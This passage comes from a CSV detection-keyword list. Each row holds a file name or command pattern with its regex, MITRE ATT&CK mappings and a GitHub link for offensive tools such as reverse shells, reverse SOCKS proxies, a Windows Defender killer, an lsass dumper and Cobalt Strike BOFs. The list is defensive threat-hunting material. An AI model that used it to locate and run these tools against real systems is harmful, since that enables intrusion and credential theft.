security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reverseDisableWinDef.cpp*",".{0,1000}reverseDisableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*ReverseProxy.dll*",".{0,1000}ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*ReverseShell.ps1*",".{0,1000}ReverseShell\.ps1.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*ReverseShell_20*.ps1*",".{0,1000}ReverseShell_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 
Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*ReverseSocksProxyHandler.*",".{0,1000}ReverseSocksProxyHandler\..{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*ReverseSocksProxyHandler.py*",".{0,1000}ReverseSocksProxyHandler\.py.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*reverse-ssh *@*",".{0,1000}reverse\-ssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh -p*",".{0,1000}reverse\-ssh\s\-p.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh -v*",".{0,1000}reverse\-ssh\s\-v.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh.exe*",".{0,1000}reverse\-ssh\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh/releases/latest*",".{0,1000}reverse\-ssh\/releases\/latest.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-sshx64.exe*",".{0,1000}reverse\-sshx64\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-sshx86.exe*",".{0,1000}reverse\-sshx86\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*ReverseTCP.ps1*",".{0,1000}ReverseTCP\.ps1.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 
","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*ReverseTCPShell-main*",".{0,1000}ReverseTCPShell\-main.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*ReversingID/Shellcode-Loader*",".{0,1000}ReversingID\/Shellcode\-Loader.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*REVERST_CERTIFICATE_PATH*",".{0,1000}REVERST_CERTIFICATE_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_LOG*",".{0,1000}REVERST_LOG.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_PRIVATE_KEY_PATH*",".{0,1000}REVERST_PRIVATE_KEY_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_SERVER_NAME*",".{0,1000}REVERST_SERVER_NAME.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 
and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_TUNNEL_ADDRESS*",".{0,1000}REVERST_TUNNEL_ADDRESS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_TUNNEL_GROUPS*",".{0,1000}REVERST_TUNNEL_GROUPS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*RevertToSelf was successful*",".{0,1000}RevertToSelf\swas\ssuccessful.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Revoke-Obfuscation*",".{0,1000}Revoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. 
used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","696","119","2023-12-01T02:04:51Z","2017-07-11T01:20:48Z" "*revsockaddr.sin_addr.s_addr = inet_addr(*",".{0,1000}revsockaddr\.sin_addr\.s_addr\s\=\sinet_addr\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*revsocks - reverse socks5 server/client*",".{0,1000}revsocks\s\-\sreverse\ssocks5\sserver\/client.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks -connect*",".{0,1000}revsocks\s\-connect.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks -dns*",".{0,1000}revsocks\s\-dns.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks -listen*",".{0,1000}revsocks\s\-listen.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" 
"*revsocks_darwin_amd64*",".{0,1000}revsocks_darwin_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_freebsd_386*",".{0,1000}revsocks_freebsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_freebsd_amd64*",".{0,1000}revsocks_freebsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_freebsd_arm*",".{0,1000}revsocks_freebsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_386*",".{0,1000}revsocks_linux_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_amd64*",".{0,1000}revsocks_linux_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" 
"*revsocks_linux_arm*",".{0,1000}revsocks_linux_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_mips*",".{0,1000}revsocks_linux_mips.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_mipsle*",".{0,1000}revsocks_linux_mipsle.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_s390x*",".{0,1000}revsocks_linux_s390x.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_netbsd_386*",".{0,1000}revsocks_netbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_netbsd_amd64*",".{0,1000}revsocks_netbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" 
"*revsocks_netbsd_arm*",".{0,1000}revsocks_netbsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_openbsd_386*",".{0,1000}revsocks_openbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_openbsd_amd64*",".{0,1000}revsocks_openbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_windows_386.exe*",".{0,1000}revsocks_windows_386\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_windows_amd64.exe*",".{0,1000}revsocks_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocksserver.h*",".{0,1000}revsocksserver\.h.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*revTCPclient.ps1*",".{0,1000}revTCPclient\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*RevTcpShell.exe*",".{0,1000}RevTcpShell\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*RevWinDefKiller.exe*",".{0,1000}RevWinDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*RhinoSecurityLabs*",".{0,1000}RhinoSecurityLabs.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RhinoSecurityLabs/pacu*",".{0,1000}RhinoSecurityLabs\/pacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*-Rhost * -Port * -Cmd *cmd /c*",".{0,1000}\-Rhost\s.{0,1000}\s\-Port\s.{0,1000}\s\-Cmd\s.{0,1000}cmd\s\/c.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*rhosts_walker_spec.rb*",".{0,1000}rhosts_walker_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ricardojoserf/NativeDump*",".{0,1000}ricardojoserf\/NativeDump.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*RiccardoAncarani/BOFs*",".{0,1000}RiccardoAncarani\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*RiccardoAncarani/LiquidSnake*",".{0,1000}RiccardoAncarani\/LiquidSnake.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*RiccardoAncarani/TaskShell*",".{0,1000}RiccardoAncarani\/TaskShell.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*rid_hijack.py*",".{0,1000}rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" 